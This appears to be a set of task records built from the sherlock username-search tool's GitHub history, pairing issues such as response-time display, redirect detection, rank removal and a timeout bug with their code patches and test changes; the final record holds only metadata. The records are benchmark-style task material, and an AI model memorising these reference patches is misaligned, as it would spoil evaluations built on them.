get_response(request_future, error_type, social_network, verbose=False): try: rsp = request_future.result() if rsp.status_code: - return rsp, error_type + return rsp, error_type, rsp.elapsed except requests.exceptions.HTTPError as errh: print_error(errh, "HTTP Error:", social_network, verbose) except requests.exceptions.ConnectionError as errc: @@ -58,7 +109,7 @@ def get_response(request_future, error_type, social_network, verbose=False): print_error(errt, "Timeout Error:", social_network, verbose) except requests.exceptions.RequestException as err: print_error(err, "Unknown error:", social_network, verbose) - return None, "" + return None, "", -1 def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): @@ -119,8 +170,8 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): underlying_request = TorRequest() underlying_session = underlying_request.session() - # Create multi-threaded session for all requests - session = FuturesSession(executor=executor, session=underlying_session) + # Create multi-threaded session for all requests. Use our custom FuturesSession that exposes response time + session = ElapsedFuturesSession(executor=executor, session=underlying_session) # Results from analysis of all sites results_total = {} @@ -193,10 +244,10 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): # Retrieve future and ensure it has finished future = net_info["request_future"] - r, error_type = get_response(request_future=future, - error_type=error_type, - social_network=social_network, - verbose=verbose) + r, error_type, response_time = get_response(request_future=future, + error_type=error_type, + social_network=social_network, + verbose=verbose) # Attempt to get request information try: @@ -212,59 +263,35 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): error = net_info.get("errorMsg") # Checks if the error message is in the HTML if not error in r.text: - - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.GREEN + "+" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:").format(social_network), url) + print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount=amount+1 else: - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.RED + "-" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:" + - Fore.YELLOW + " Not Found!").format(social_network)) + print_not_found(social_network, response_time, verbose) exists = "no" elif error_type == "status_code": # Checks if the status code of the response is 2XX if not r.status_code >= 300 or r.status_code < 200: - - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.GREEN + "+" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:").format(social_network), url) + print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount=amount+1 else: - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.RED + "-" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:" + - Fore.YELLOW + " Not Found!").format(social_network)) + print_not_found(social_network, response_time, verbose) exists = "no" elif error_type == "response_url": error = net_info.get("errorUrl") # Checks if the redirect url is the same as the one defined in data.json if not error in r.url: - - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.GREEN + "+" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:").format(social_network), url) + print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount=amount+1 else: - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.RED + "-" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:" + - Fore.YELLOW + " Not Found!").format(social_network)) + print_not_found(social_network, response_time, verbose) exists = "no" elif error_type == "": @@ -276,11 +303,12 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): exists = "error" # Save exists flag - results_site['exists'] = exists + results_site['exists'] = exists # Save results from request - results_site['http_status'] = http_status + results_site['http_status'] = http_status results_site['response_text'] = response_text + results_site['response_time_ms'] = response_time # Add this site's results into final dictionary with all of the other results. results_total[social_network] = results_site @@ -311,7 +339,7 @@ def main(): ) parser.add_argument("--verbose", "-v", "-d", "--debug", action="store_true", dest="verbose", default=False, - help="Display extra debugging information." + help="Display extra debugging information and metrics." ) parser.add_argument("--quiet", "-q", action="store_false", dest="verbose", @@ -393,7 +421,8 @@ def main(): 'url_main', 'url_user', 'exists', - 'http_status' + 'http_status', + 'response_time_ms' ] ) for site in results: @@ -402,9 +431,11 @@ def main(): results[site]['url_main'], results[site]['url_user'], results[site]['exists'], - results[site]['http_status'] + results[site]['http_status'], + results[site]['response_time_ms'] ] ) + if __name__ == "__main__": main() \ No newline at end of file
Display response times in verbose mode ## Feature Request It would be nice to display the response time for each request. ### Why? - It would help us determine which sites cause the program to slow down. If a site is very slow and non-critical, we could remove it to speed up Sherlock. - The more metrics the merrier! Has very little overhead, so why not :) ### User Experience We would only display this information in verbose mode (`-v` flag). The information can be displayed in each output line as: ```txt [+] [78 ms] Quora: https://www.quora.com/profile/nareddyt ``` Furthermore, these response times can be exported in the CSV. ### Implementation Details We would just need to store the time reach request was created in the `net_info` or `results_site` dictionaries. Then when the request is done, we would note the end time. Note there is some math involved in calculating times. It's not a simple `end-start` because the `result` for each response is extracted in the order of requests (not as soon as a request finishes). This is something I still need to think about...
Sounds good. Maybe then we could sort the sites by their response time and check the fastest ones first. Sounds great @nareddyt 😊, Let me know if you going to give it a hand ☺️ Here is my initial prototype of this feature. I was able to make use of [requests-futures' built-in hooks API](https://github.com/ross/requests-futures#working-in-the-background) to compute the response times per request in a parallel fashion. This introduces very little overhead. ![image](https://user-images.githubusercontent.com/11142171/50747375-96749200-1201-11e9-9185-52e0e6838673.png) For now, I will keep this feature simple and only display the response times in the console / csv. We can work on more advanced uses of these metrics (like the suggestion by @Czechball) once this initial feature is merged. I'll send out a PR once I clean up my code and also thoroughly test it :)
2019-01-07T17:19:28
sherlock-project/sherlock
135
sherlock-project__sherlock-135
[ "128" ]
fba27cd709d684c0f5a4f644c8db71a3de6b10cb
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -208,13 +208,27 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False, pr if net_info["errorType"] == 'status_code': request_method = session.head + if net_info["errorType"] == "response_url": + #Site forwards request to a different URL if username not + #found. Disallow the redirect so we can capture the + #http status from the original URL request. + allow_redirects = False + else: + #Allow whatever redirect that the site wants to do. + #The final result of the request will be what is available. + allow_redirects = True + # This future starts running the request in a new thread, doesn't block the main thread if proxy != None: proxies = {"http": proxy, "https": proxy} - future = request_method( - url=url, headers=headers, proxies=proxies) + future = request_method(url=url, headers=headers, + proxies=proxies, + allow_redirects=allow_redirects + ) else: - future = request_method(url=url, headers=headers) + future = request_method(url=url, headers=headers, + allow_redirects=allow_redirects + ) # Store future in data for access later net_info["request_future"] = future @@ -290,9 +304,13 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False, pr exists = "no" elif error_type == "response_url": - error = net_info.get("errorUrl") - # Checks if the redirect url is the same as the one defined in data.json - if not error in r.url: + # For this detection method, we have turned off the redirect. + # So, there is no need to check the response URL: it will always + # match the request. Instead, we will ensure that the response + # code indicates that the request was successful (i.e. no 404, or + # forward to some odd redirect). + if (r.status_code >= 200) and (r.status_code < 300): + # print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes"
diff --git a/tests/all.py b/tests/all.py --- a/tests/all.py +++ b/tests/all.py @@ -23,7 +23,7 @@ def test_detect_true(self): """ self.username_check(['jack'], ['Twitter'], exist_check=True) - #self.username_check(['dfox'], ['devRant'], exist_check=True) + self.username_check(['dfox'], ['devRant'], exist_check=True) self.username_check(['blue'], ['Pinterest'], exist_check=True) self.username_check(['kevin'], ['Instagram'], exist_check=True) self.username_check(['zuck'], ['Facebook'], exist_check=True) @@ -92,3 +92,51 @@ def test_detect_false_via_response_url(self): ) return + + +class SherlockSiteCoverageTests(SherlockBaseTest): + def test_coverage_false_via_response_url(self): + """Test Username Does Not Exist Site Coverage (Via Response URL). + + This test checks all sites with the "response URL" detection mechanism + to ensure that a Username that does not exist is reported that way. + + Keyword Arguments: + self -- This object. + + Return Value: + N/A. + Will trigger an assert if detection mechanism did not work as expected. + """ + + self.username_check(['noonewouldeverusethis7'], + ["Pinterest", "iMGSRC.RU", "Pastebin", + "WordPress", "devRant", "ImageShack", "MeetMe" + ], + exist_check=False + ) + + return + + def test_coverage_true_via_response_url(self): + """Test Username Does Exist Site Coverage (Via Response URL). + + This test checks all sites with the "response URL" detection mechanism + to ensure that a Username that does exist is reported that way. + + Keyword Arguments: + self -- This object. + + Return Value: + N/A. + Will trigger an assert if detection mechanism did not work as expected. + """ + + self.username_check(['blue'], + ["Pinterest", "iMGSRC.RU", "Pastebin", + "WordPress", "devRant", "ImageShack", "MeetMe" + ], + exist_check=True + ) + + return
devRant/iMGSRC.RU/ImageShack/MeetMe Not Detecting Users That Exist Noticed while running the tests that devRant is not working right. @TheYahya suggested during the review of #105 that we use the usernames of founders tests (as they would be expected to never delete their accounts). But, when I tried to find the "dfox" username, it said that it did not exist. Yet, if I go to https://devrant.com/users/dfox, I can see his profile. Here is the example command that demonstrates the problem: ``` python -u sherlock.py dfox --site devRant --verbose ``` Looks like @sdushantha added this site originally.
This appears to be a problem with the sites that redirect an attempt to view a non-existing username to the main site. If you try to go to https://devrant.com/users/dfoxxxxxxxxx (a user name that does not exist), then we get a redirect to the https://devrant.com/ root of the site. Yet, the "response_url" checking algorithm is only looking for the configured error URL being included in the response: ```python elif error_type == "response_url": error = net_info.get("errorUrl") # Checks if the redirect url is the same as the one defined in data.json if not error in r.url: print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount = amount+1 else: print_not_found(social_network, response_time, verbose) exists = "no" ``` Since "https://devrant.com/" is in "https://devrant.com/users/dfox", it is marked as an unknown username. Pinterest (for example) has a response URL of "https://www.pinterest.com/?show_error=true". So this does not cause the problem, as there is no overlap between a good username and the error URL.
2019-01-23T02:43:44
sherlock-project/sherlock
139
sherlock-project__sherlock-139
[ "131" ]
adab51e580080897c22ce19cbd0626da6341c11b
diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -7,6 +7,11 @@ with open("data.json", "r", encoding="utf-8") as data_file: data = json.load(data_file) +sorted_json_data = json.dumps(data, indent=2, sort_keys=True) + +with open("data.json", "w") as data_file: + data_file.write(sorted_json_data) + with open("sites.md", "w") as site_file: site_file.write(f'## List Of Supported Sites ({len(data)} Sites In Total!)\n')
Sites sorting It may be a good idea to sort the sites in sites.md and data.json alphabetically. When I'm looking for sites to add, I always have to Ctrl+F in this repo or just scroll through the file... Also when seeing the results, it's just chaos.
Yeah, I have same struggle. It's good to sort them. A bit of an addition to this idea, how about adding an option to sort by alexa.com rank? It's great @ptalmeida, but I'm afraid that the addition time to fetch ranks make it take too long. Maybe it should be incorporated into the json data file and updated, per example, with sites_list.py.
2019-01-23T13:10:37
sherlock-project/sherlock
704
sherlock-project__sherlock-704
[ "610" ]
0f51e01686031e984749f84c8f377fdacdb579d4
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -438,9 +438,6 @@ def main(): action="store_true", dest="verbose", default=False, help="Display extra debugging information and metrics." ) - parser.add_argument("--rank", "-r", - action="store_true", dest="rank", default=False, - help="Present websites ordered by their Alexa.com global rank in popularity.") parser.add_argument("--folderoutput", "-fo", dest="folderoutput", help="If using multiple usernames, the output of the results will be saved to this folder." ) @@ -557,15 +554,6 @@ def main(): f"Error: Desired sites not found: {', '.join(site_missing)}.") sys.exit(1) - if args.rank: - # Sort data by rank - site_dataCpy = dict(site_data) - ranked_sites = sorted(site_data, key=lambda k: ("rank" not in k, site_data[k].get("rank", sys.maxsize))) - site_data = {} - for site in ranked_sites: - site_data[site] = site_dataCpy.get(site) - - #Create notify object for query results. query_notify = QueryNotifyPrint(result=None, verbose=args.verbose, diff --git a/sherlock/sites.py b/sherlock/sites.py --- a/sherlock/sites.py +++ b/sherlock/sites.py @@ -11,9 +11,8 @@ class SiteInformation(): - def __init__(self, name, url_home, url_username_format, popularity_rank, - username_claimed, username_unclaimed, - information): + def __init__(self, name, url_home, url_username_format, username_claimed, + username_unclaimed, information): """Create Site Information Object. Contains information about a specific web site. @@ -32,10 +31,6 @@ def __init__(self, name, url_home, url_username_format, popularity_rank, usernames would show up under the "https://somesite.com/users/" area of the web site. - popularity_rank -- Integer indicating popularity of site. - In general, smaller numbers mean more - popular ("0" or None means ranking - information not available). username_claimed -- String containing username which is known to be claimed on web site. username_unclaimed -- String containing username which is known @@ -58,11 +53,6 @@ def __init__(self, name, url_home, url_username_format, popularity_rank, self.url_home = url_home self.url_username_format = url_username_format - if (popularity_rank is None) or (popularity_rank == 0): - #We do not know the popularity, so make site go to bottom of list. - popularity_rank = sys.maxsize - self.popularity_rank = popularity_rank - self.username_claimed = username_claimed self.username_unclaimed = username_unclaimed self.information = information @@ -118,22 +108,19 @@ def __init__(self, data_file_path=None): """ if data_file_path is None: - #Use internal default. - data_file_path = \ - os.path.join(os.path.dirname(os.path.realpath(__file__)), - "resources/data.json" - ) - - #Ensure that specified data file has correct extension. - if ".json" != data_file_path[-5:].lower(): + # The default data file is the live data.json which is in the GitHub repo. The reason why we are using + # this instead of the local one is so that the user has the most up to date data. This prevents + # users from creating issue about false positives which has already been fixed or having outdated data + data_file_path = "https://raw.githubusercontent.com/sherlock-project/sherlock/master/sherlock/resources/data.json" + + # Ensure that specified data file has correct extension. + if not data_file_path.lower().endswith(".json"): raise FileNotFoundError(f"Incorrect JSON file extension for " f"data file '{data_file_path}'." ) - if ( ("http://" == data_file_path[:7].lower()) or - ("https://" == data_file_path[:8].lower()) - ): - #Reference is to a URL. + if "http://" == data_file_path[:7].lower() or "https://" == data_file_path[:8].lower(): + # Reference is to a URL. try: response = requests.get(url=data_file_path) except Exception as error: @@ -172,14 +159,11 @@ def __init__(self, data_file_path=None): #Add all of site information from the json file to internal site list. for site_name in site_data: try: - #If popularity unknown, make site be at bottom of list. - popularity_rank = site_data[site_name].get("rank", sys.maxsize) self.sites[site_name] = \ SiteInformation(site_name, site_data[site_name]["urlMain"], site_data[site_name]["url"], - popularity_rank, site_data[site_name]["username_claimed"], site_data[site_name]["username_unclaimed"], site_data[site_name] @@ -192,32 +176,17 @@ def __init__(self, data_file_path=None): return - def site_name_list(self, popularity_rank=False): + def site_name_list(self): """Get Site Name List. Keyword Arguments: self -- This object. - popularity_rank -- Boolean indicating if list should be sorted - by popularity rank. - Default value is False. - NOTE: List is sorted in ascending - alphabetical order is popularity rank - is not requested. Return Value: List of strings containing names of sites. """ - if popularity_rank: - #Sort in ascending popularity rank order. - site_rank_name = \ - sorted([(site.popularity_rank,site.name) for site in self], - key=operator.itemgetter(0) - ) - site_names = [name for _,name in site_rank_name] - else: - #Sort in ascending alphabetical order. - site_names = sorted([site.name for site in self], key=str.lower) + site_names = sorted([site.name for site in self], key=str.lower) return site_names diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -1,40 +1,12 @@ """Sherlock: Supported Site Listing -This module generates the listing of supported sites. +This module generates the listing of supported sites +which can be found in sites.md +It also organizes all the sites in alphanumeric order """ import json -import sys -import requests -import threading -import xml.etree.ElementTree as ET -from datetime import datetime -from argparse import ArgumentParser, RawDescriptionHelpFormatter pool = list() -def get_rank(domain_to_query, dest): - - #Retrieve ranking data via alexa API - url = f"http://data.alexa.com/data?cli=10&url={domain_to_query}" - xml_data = requests.get(url).text - root = ET.fromstring(xml_data) - try: - #Get ranking for this site. - dest['rank'] = int(root.find(".//REACH").attrib["RANK"]) - except: - #We did not find the rank for some reason. - print(f"Error retrieving rank information for '{domain_to_query}'") - print(f" Returned XML is |{xml_data}|") - - return - -parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter - ) -parser.add_argument("--rank","-r", - action="store_true", dest="rank", default=False, - help="Update all website ranks (not recommended)." - ) -args = parser.parse_args() - with open("sherlock/resources/data.json", "r", encoding="utf-8") as data_file: data = json.load(data_file) @@ -44,30 +16,17 @@ def get_rank(domain_to_query, dest): for social_network in data: url_main = data.get(social_network).get("urlMain") - data.get(social_network)["rank"] = 0 - if args.rank: - th = threading.Thread(target=get_rank, args=(url_main, data.get(social_network))) - else: - th = None - pool.append((social_network, url_main, th)) - if args.rank: - th.start() + pool.append((social_network, url_main)) index = 1 - for social_network, url_main, th in pool: - if args.rank: - th.join() + for social_network, url_main in pool: site_file.write(f'{index}. [{social_network}]({url_main})\n') - sys.stdout.write("\r{0}".format(f"Updated {index} out of {data_length} entries")) - sys.stdout.flush() index = index + 1 - if args.rank: - site_file.write(f'\nAlexa.com rank data fetched at ({datetime.utcnow()} UTC)\n') sorted_json_data = json.dumps(data, indent=2, sort_keys=True) with open("sherlock/resources/data.json", "w") as data_file: data_file.write(sorted_json_data) -print("\nFinished updating supported site listing!") +print("Finished updating supported site listing!")
Ranking using site_list.py only works from certain countries Hi, For some strange reason `site_list.py` seems to be working for some people and not for others. When I run `python3 site_list.py -r`, to update the ranking, all the ranks get set to 0 and I get errors about the XML data that is returned by data.alexa.com. This is because all I am getting is this: ![Screenshot 2020-05-17 at 07 53 41](https://user-images.githubusercontent.com/27065646/82136986-dabf6b80-9813-11ea-938c-5efa1e520bc0.png) But when I use a VPN and change my location from Norway to Dallas, which is a city in the US, I seem to get the expected response: ![updated](https://user-images.githubusercontent.com/27065646/82137013-10645480-9814-11ea-9840-e2104451a317.png) From this, we can understand that this API seems to not be working properly in certain countries. This issue has been seen here: https://github.com/matomo-org/matomo/issues/13427 https://stackoverflow.com/questions/3676376/fetching-alexa-data#comment87619041_6224304 I personally think, if the ranking does not work for everyone, then it would be best to remove it.
If we remove this script's access to the Alexa API, then we will have to remove the aspects of Sherlock that use the site ranking. Is that OK? I am thinking that if we automate the invocation of this script using GitHub actions, then no one will have to run it on their own computer any more. Since the GitHub Actions for Sherlock appear to be running in the US, then it will work reliably. While the script does generally work for me, it still flakes out on some sites. I think it is because Sherlock has enough sites that it is exceeding the API limits. > If we remove this script's access to the Alexa API, then we will have to remove the aspects of Sherlock that use the site ranking. Is that OK? Yeah I personally think that doing so would be fine because like you mentioned, its flakes out on some sites and that might be because its exceeding the API limits. So, removing the site ranking would be the best thing to do as it is not stable. It seems like it better to remove the site ranking because I tried running `site_list.py` using a VPN, where my location was Los Angeles and I keep getting this response: ```xml <!-- Need more Alexa data? Find our APIs here: https://aws.amazon.com/alexa/ --> ``` There is rate limit
2020-08-07T19:15:53
sherlock-project/sherlock
911
sherlock-project__sherlock-911
[ "909" ]
ecf7e4d02f976c0c244beb4a0b3be688a4b9ea6a
diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -18,11 +18,8 @@ url_main = data.get(social_network).get("urlMain") pool.append((social_network, url_main)) - index = 1 for social_network, url_main in pool: - site_file.write(f'{index}. [{social_network}]({url_main})\n') - index = index + 1 - + site_file.write(f'1. [{social_network}]({url_main})\n') sorted_json_data = json.dumps(data, indent=2, sort_keys=True)
[site_list.py] change numbering to reduce commit size letting the markdown renderer do the counting lets us reduce commit size and avoide possible merge conflicts. --- ``` 1. 1. 1. ``` renders to: 1. 1. 1.
2020-12-19T10:35:32
sherlock-project/sherlock
1,518
sherlock-project__sherlock-1518
[ "1284" ]
11b519b7ad39f89ebd14da69fb9880269dc2c8ce
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -551,7 +551,7 @@ def main(): parser.add_argument("username", nargs="+", metavar="USERNAMES", action="store", - help="One or more usernames to check with social networks." + help="One or more usernames to check with social networks. Check similar usernames using {%%} (replace to '_', '-', '.')." ) parser.add_argument("--browse", "-b", action="store_true", dest="browse", default=False,
Check multiple similar usernames <!-- ###################################################################### WARNING! IGNORING THE FOLLOWING TEMPLATE WILL RESULT IN ISSUE CLOSED AS INCOMPLETE ###################################################################### --> ## Checklist <!-- Put x into all boxes (like this [x]) once you have completed what they say. Make sure complete everything in the checklist. --> - [x] I'm reporting a feature request - [x] I've checked for similar feature requests including closed ones ## Description <!-- Provide a detailed description of the feature you would like Sherlock to have --> It's good to search similar usernames. for example when searching for `user{?}name` we should also check for: `_`, `-` and `.` 1. `username` 2. `user.name` 3. `user-name` 4. `user_name`
I can work on it. when inputting sherlock {username} just add more, example: sherlock PxINKY P_xINKY Px_INKY > pink.txt no need to make a feature if you can just write 3 more words Closing this as it's been PR-ed and merged already. * https://github.com/sherlock-project/sherlock/pull/1298 Actually sorry, I realize there is no documentation on this in the README. 🤔 I'll reopen it, later someone (probably me) can go document it. Three more days Sent from Yahoo Mail on Android On Mon, Apr 4, 2022 at 2:14 PM, ***@***.***> wrote: when inputting sherlock {username} just add more, example: sherlock PxINKY P_xINKY Px_INKY > pink.txt no need to make a feature if you can just write 3 more words — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>
2022-10-05T07:54:32
sherlock-project/sherlock
1,723
sherlock-project__sherlock-1723
[ "1480" ]
61bb34b0213482164247df496a063b9e41b98f78
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -28,7 +28,7 @@ from colorama import init module_name = "Sherlock: Find Usernames Across Social Networks" -__version__ = "0.14.3" +__version__ = "0.14.2" class SherlockFuturesSession(FuturesSession): @@ -537,12 +537,12 @@ def main(): help="Time (in seconds) to wait for response to requests (Default: 60)" ) parser.add_argument("--print-all", - action="store_true", dest="print_all", + action="store_true", dest="print_all", default=False, help="Output sites where the username was not found." ) parser.add_argument("--print-found", - action="store_false", dest="print_all", default=False, - help="Output sites where the username was found." + action="store_true", dest="print_found", default=True, + help="Output sites where the username was found (also if exported as file)." ) parser.add_argument("--no-color", action="store_true", dest="no_color", default=False, @@ -640,7 +640,6 @@ def main(): site_data = site_data_all else: # User desires to selectively run queries on a sub-set of the site list. - # Make sure that the sites are supported & build up pruned site database. site_data = {} site_missing = [] @@ -668,7 +667,6 @@ def main(): browse=args.browse) # Run report on all specified users. - all_usernames = [] for username in args.username: if (CheckForParameter(username)): @@ -726,6 +724,9 @@ def main(): ] ) for site in results: + if args.print_found and not args.print_all and results[site]["status"].status != QueryStatus.CLAIMED: + continue + response_time_s = results[site]["status"].query_time if response_time_s is None: response_time_s = "" @@ -748,6 +749,9 @@ def main(): response_time_s = [] for site in results: + if args.print_found and not args.print_all and results[site]["status"].status != QueryStatus.CLAIMED: + continue + if response_time_s is None: response_time_s.append("") else: @@ -768,4 +772,3 @@ def main(): if __name__ == "__main__": main() - # Notify caller that all queries are finished.
fixes #1431 Adding --print-found as an argument will make the CVS and/or xlsx files to only contain those accounts that were found. Previously, there was only the variable 'print_all', which was set by the parameters '--print-all' and '--print-found'. Since the behaviour is to print only those that are found, the parameter '--print-found' was not producing any difference. With the changes, now '--print-found' will make the csv and xlsx file have only the accounts that were found. fixes #1431
I need to take further look into this. Will do it this week when I get some extra time
2023-03-06T08:36:32
sherlock-project/sherlock
1,963
sherlock-project__sherlock-1963
[ "1960" ]
4525fb48ad90d95cb7b9d7f01a93f226242cde81
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -470,12 +470,14 @@ def timeout_check(value): NOTE: Will raise an exception if the timeout in invalid. """ - if value <= 0: + float_value = float(value) + + if float_value <= 0: raise ArgumentTypeError( f"Invalid timeout value: {value}. Timeout must be a positive number." ) - return float(value) + return float_value def handler(signal_received, frame):
--timeout error <!-- ###################################################################### WARNING! IGNORING THE FOLLOWING TEMPLATE WILL RESULT IN ISSUE CLOSED AS INCOMPLETE. ###################################################################### --> ## Checklist <!-- Put x into all boxes (like this [x]) once you have completed what they say. Make sure complete everything in the checklist. --> - [X] I'm asking a question regarding Sherlock - [ ] My question is not a tech support question. ## Question im having the following error: sherlock: error: argument --timeout: invalid timeout_check value: '1' What should I write as argument of --timeout?
I am having the exact same problem, so if someone gets the answer tell us!
2023-12-25T02:00:45
sherlock-project/sherlock
1,974
sherlock-project__sherlock-1974
[ "1968" ]
8965cf12e3df28ee78a5d01da14b8aec40d8e8b4
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -617,7 +617,7 @@ def main(): nargs="+", metavar="USERNAMES", action="store", - help="One or more usernames to check with social networks. Check similar usernames using {%%} (replace to '_', '-', '.').", + help="One or more usernames to check with social networks. Check similar usernames using {?} (replace to '_', '-', '.').", ) parser.add_argument( "--browse",
Trouble with the "{%}" argument <!-- ###################################################################### WARNING! IGNORING THE FOLLOWING TEMPLATE WILL RESULT IN ISSUE CLOSED AS INCOMPLETE ###################################################################### --> ## Checklist <!-- Put x into all boxes (like this [x]) once you have completed what they say. Make sure complete everything in the checklist. --> - [x] I'm reporting a bug in Sherlock's functionality - [x] The bug I'm reporting is not a false positive or a false negative - [x] I've verified that I'm running the latest version of Sherlock - [x] I've checked for similar bug reports including closed ones - [ ] I've checked for pull requests that attempt to fix this bug ## Description <!-- Provide a detailed description of the bug that you have found in Sherlock. Provide the version of Sherlock you are running. --> (Didn't know if this was better fit as a question or a bug, sry for the inconvenience) I have sherlock set up in a docker container and everything works 100% fine (eg.1) EXCEPT for trying to use the {%} argument (eg.2), am i stupid and have the syntax wrong?, is this powershell interpretation issue? or is this a genuine bug. eg.1 terminal functioning as intended PS C:\Windows\system32> docker run --rm -t mysherlock-image foobar [*] Checking username foobar on: [+] 7Cups: https://www.7cups.com/@foobar [+] 8tracks: https://8tracks.com/foobar [+] About.me: https://about.me/foobar [+] Academia.edu: https://independent.academia.edu/foobar [+] Airliners: https://www.airliners.net/user/foobar/profile/photos [+] AllMyLinks: https://allmylinks.com/foobar [+] Amino: https://aminoapps.com/u/foobar [+] Apple Developer: https://developer.apple.com/forums/profile/foobar PS C:\Windows\system32> ^C eg.2 throwing big angry errors when using {%} PS C:\Windows\system32> docker run --rm -t mysherlock-image foo{%}bar usage: sherlock.py [-h] [--version] [--verbose] [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] [--unique-tor] [--csv] [-x lsx] [--site SITE_NAME] [--proxy PROXY_URL] [--json JSON_FILE] [--timeout TIMEOUT] [--print-all] [--print-found] [--no-color] [--browse] [--local] [--nsfw] sherlock.py: error: unrecognized arguments: -encodedCommand JQA= bar -inputFormat xml text I'm 99% sure i'm probably just stupid, and this is a me problem. but thought id post anyway just in case. *Latest build as of today*
Hi @TryMyWagon, thanks for opening this issue. You are not stupid. I checked, and you are right about the problem. It seems we made a small error in the documentation, and we apologize for that. I will fix it. 😅 You should use `{?}` instead of `{%}`: ```bash python sherlock user{?}name ``` or: ```bash python sherlock 'user{?}name' ```
2024-01-19T21:23:58
sherlock-project/sherlock
2,068
sherlock-project__sherlock-2068
[ "2071", "2096" ]
55c680fde1d6eb94e55870e1be6243c88732cea8
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -232,7 +232,7 @@ def sherlock( # A user agent is needed because some sites don't return the correct # information since they think that we are bots (Which we actually are...) headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0", } if "headers" in net_info: @@ -351,7 +351,6 @@ def sherlock( # Get the expected error type error_type = net_info["errorType"] - error_code = net_info.get("errorCode") # Retrieve future and ensure it has finished future = net_info["request_future"] @@ -407,13 +406,16 @@ def sherlock( else: query_status = QueryStatus.AVAILABLE elif error_type == "status_code": - # Checks if the Status Code is equal to the optional "errorCode" given in 'data.json' - if error_code == r.status_code: + error_codes = net_info.get("errorCode") + query_status = QueryStatus.CLAIMED + + # Type consistency, allowing for both singlets and lists in manifest + if isinstance(error_codes, int): + error_codes = [error_codes] + + if error_codes is not None and r.status_code in error_codes: query_status = QueryStatus.AVAILABLE - # Checks if the status code of the response is 2XX - elif not r.status_code >= 300 or r.status_code < 200: - query_status = QueryStatus.CLAIMED - else: + elif r.status_code >= 300 or r.status_code < 200: query_status = QueryStatus.AVAILABLE elif error_type == "response_url": # For this detection method, we have turned off the redirect.
Yandex Music has a captcha <!-- ###################################################################### WARNING! IGNORING THE FOLLOWING TEMPLATE WILL RESULT IN ISSUE CLOSED AS INCOMPLETE ###################################################################### --> ## Checklist <!-- Put x into all boxes (like this [x]) once you have completed what they say. Make sure complete everything in the checklist. --> - [x] I'm reporting a website that is returning **false positive** results - [x] I've checked for similar site support requests including closed ones - [x] I've checked for pull requests attempting to fix this false positive - [x] I'm only reporting **one** site (create a separate issue for each site) ## Description <!-- Provide the username that is causing Sherlock to return a false positive, along with any other information that might help us fix this false positive. --> Here's a random username that can't possibly exist: [ecfhlmiuewfimcuhem](https://music.yandex/users/ecfhlmiuewfimcuhem/playlists). Here's the username from [data.json](https://github.com/sherlock-project/sherlock/blob/master/sherlock/resources/data.json#L2214): [ya.playlist](https://music.yandex/users/ya.playlist/playlists) When I visit either, I get a captcha (note: JS is disabled in my browser): ![image](https://github.com/sherlock-project/sherlock/assets/65649991/3c93012d-991a-46a2-b0af-60edf5772eec) Unless Sherlock uses Selenium/Pyppeteer, which i highly doubt (it's not in requirements.txt), this captcha isn't really avoidable (I think). Maybe it even shows up with JS enabled, which I didn't check. I'm not opening a PR removing YandexMusic because it could be an issue that only happens for me, or maybe it's possible to bypass this captcha. Use lite version of archive.org, change error message. Archive.org detects the use of old browsers, and redirects them to a "lite" version of archive.org. For some reason, the requests module is also redirected. This PR fixes this issue.
2024-04-08T02:37:41
sherlock-project/sherlock
2,069
sherlock-project__sherlock-2069
[ "1878" ]
55c680fde1d6eb94e55870e1be6243c88732cea8
